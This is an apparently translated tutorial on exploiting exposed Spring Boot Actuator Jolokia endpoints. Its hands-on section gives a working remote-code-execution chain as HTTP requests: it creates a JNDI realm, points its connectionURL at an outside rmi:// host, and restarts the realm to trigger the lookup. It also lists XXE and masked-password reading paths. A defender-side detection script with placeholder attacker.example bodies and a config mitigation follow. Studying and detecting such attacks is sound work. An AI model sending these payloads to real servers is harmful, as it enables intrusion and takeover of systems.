Environment setup
When a Java project uses the spring-boot-starter-actuator component, the Actuator management endpoints are registered and exposed. In Spring Boot 1.x all management endpoints are exposed by default; in Spring Boot 2.x only the health and info endpoints are exposed by default, and further endpoints can be enabled through the Spring configuration file when needed.
<!-- Add the Spring management controller; used to test directory scanning -->
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-actuator</artifactId>
<version>${spring-boot-starter-web.version}</version>
</dependency>
Jolokia overview
Jolokia is a Java interface for remote access to MBeans. Through the Jolokia interface, Java Beans can be controlled, which amounts to remote Bean invocation.
Common Jolokia attack paths
⚪ Use type=ch.qos.logback.classic.jmx.JMXConfigurator to achieve XXE
⚪ Use type=MBeanFactory to achieve RCE
⚪ Use the getProperty method to read values from the Spring configuration file (the passwords that are masked with *)
Hands-on
Visit the Jolokia list endpoint to view the list of all beans. Searching the output shows that type=MBeanFactory is present; this bean can be used to create a JNDI context, and a JNDI request then leads to RCE.
**Tips:** after finding MBeanFactory, look up the name of the parent node of that JSON node; it is usually Tomcat or Catalina.


Therefore, the following steps can be used against this target:
1. Create a realm object through the createJNDIRealm method of the MBeanFactory interface
{
"mbean": "Tomcat:type=MBeanFactory",
"type": "EXEC",
"operation": "createJNDIRealm",
"arguments": ["Tomcat:type=Engine"]
}


2. Create the context through the realm object
{
"mbean": "Tomcat:realmPath=/realm0,type=Realm",
"type": "WRITE",
"attribute": "contextFactory",
"value": "com.sun.jndi.rmi.registry.RegistryContextFactory"
}


3. Write the JNDI address
POST /actuator/jolokia HTTP/1.1
Host:xxx.xxx.xx
User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2269.0 Safari/537.36138
Accept-Encoding:gzip, deflate
Accept:*/*
Connection:keep-alive
{
"mbean": "Catalina:realmPath=/realm0,type=Realm",
"type": "WRITE",
"attribute": "connectionURL",
"value": "rmi://xxxx.bbb3.showmeshell.com:1099/Exploit_e4bc88baa83ffecffdfd44ea053727e8"
}


{
"mbean": "Tomcat:realmPath=/realm0,type=Realm",
"type": "WRITE",
"attribute": "connectionURL",
"value": "rmi://bbc3.showmeshell.com:1099/Exploit_7a0485c5a9d6a499e83daccfafb036fa"
}
4. Restart the Realm to trigger the JNDI request and achieve RCE
Stop the realm
POST /actuator/jolokia HTTP/1.1
Host:xxx.xxx.xx
User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2269.0 Safari/537.36138
Accept-Encoding:gzip, deflate
Accept:*/*
Connection:keep-alive
Content-Type:application/json
{
"mbean": "Catalina:realmPath=/realm0,type=Realm",
"type": "EXEC",
"operation": "stop",
"arguments": []
}


Start the realm
POST /actuator/jolokia HTTP/1.1
Host:xxx.xxx.xx
User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2269.0 Safari/537.36138
Accept-Encoding:gzip, deflate
Accept:*/*
Connection:keep-alive
Content-Type:application/json
{
"mbean": "Catalina:realmPath=/realm0,type=Realm",
"type": "EXEC",
"operation": "start",
"arguments": []
}


The RMI server then receives the following request:

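A defender-side check, added here as an example and not part of the original article: it classifies captured Jolokia POST bodies and flags the MBeanFactory createJNDIRealm, Realm contextFactory/connectionURL write and Realm stop/start sequence described above. The sample bodies are constructed (placeholder host attacker.example) and are assumed to have been taken from an access log or WAF capture.

```python
import json
from typing import Dict, Iterable, List, Optional

# Realm attributes whose modification points the realm at an attacker-chosen JNDI source.
REALM_WRITE_ATTRS = {"contextFactory", "connectionURL"}
JNDI_SCHEMES = ("rmi://", "ldap://", "ldaps://", "iiop://")

def parse_mbean(name: str) -> Dict[str, str]:
    """Split 'Tomcat:realmPath=/realm0,type=Realm' into its key/value properties."""
    if ":" not in name: return {}
    return dict(part.partition("=")[::2] for part in name.split(":", 1)[1].split(","))

def classify(body: dict) -> Optional[str]:
    """Label one Jolokia JSON request body, or return None if it looks benign."""
    props = parse_mbean(str(body.get("mbean", "")))
    rtype, op, attr = (body.get(k) for k in ("type", "operation", "attribute"))
    if props.get("type") == "MBeanFactory" and rtype == "EXEC" and op == "createJNDIRealm":
        return "jndi-realm-created"
    if props.get("type") != "Realm":
        return None
    if rtype == "WRITE" and attr in REALM_WRITE_ATTRS:
        value = str(body.get("value", ""))
        if attr == "connectionURL" and value.lower().startswith(JNDI_SCHEMES):
            return "realm-jndi-url:" + value      # remote lookup target
        return "realm-write:" + attr
    if rtype == "EXEC" and op in ("stop", "start"):
        return "realm-" + op
    return None

def scan_requests(raw_bodies: Iterable[str]) -> List[str]:
    """Label bodies in order; 'chain-complete' marks a JNDI URL write followed by a Realm start."""
    findings, url_written = [], False
    for raw in raw_bodies:
        try:
            hit = classify(json.loads(raw))
        except (json.JSONDecodeError, AttributeError):
            continue  # not a JSON object, so not a Jolokia WRITE/EXEC request
        if hit is None:
            continue
        findings.append(hit)
        url_written |= hit.startswith("realm-jndi-url:")
        if url_written and hit == "realm-start":
            findings.append("chain-complete")  # the point at which the lookup fires
    return findings

# Constructed sample bodies (placeholder host), in the order used in the walkthrough above
SAMPLE_BODIES = [
    '{"mbean":"Tomcat:type=MBeanFactory","type":"EXEC","operation":"createJNDIRealm","arguments":["Tomcat:type=Engine"]}',
    '{"mbean":"Tomcat:realmPath=/realm0,type=Realm","type":"WRITE","attribute":"contextFactory","value":"com.sun.jndi.rmi.registry.RegistryContextFactory"}',
    '{"mbean":"Catalina:realmPath=/realm0,type=Realm","type":"WRITE","attribute":"connectionURL","value":"rmi://attacker.example:1099/Obj"}',
    '{"mbean":"Catalina:realmPath=/realm0,type=Realm","type":"EXEC","operation":"stop","arguments":[]}',
    '{"mbean":"Catalina:realmPath=/realm0,type=Realm","type":"EXEC","operation":"start","arguments":[]}',
]
```

On Spring Boot 2.x the endpoint can also be kept off the web entirely with `management.endpoint.jolokia.enabled=false`, or by leaving jolokia out of `management.endpoints.web.exposure.include`.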
This article was migrated from the Knowledge Planet (知识星球) group “火线Zone”.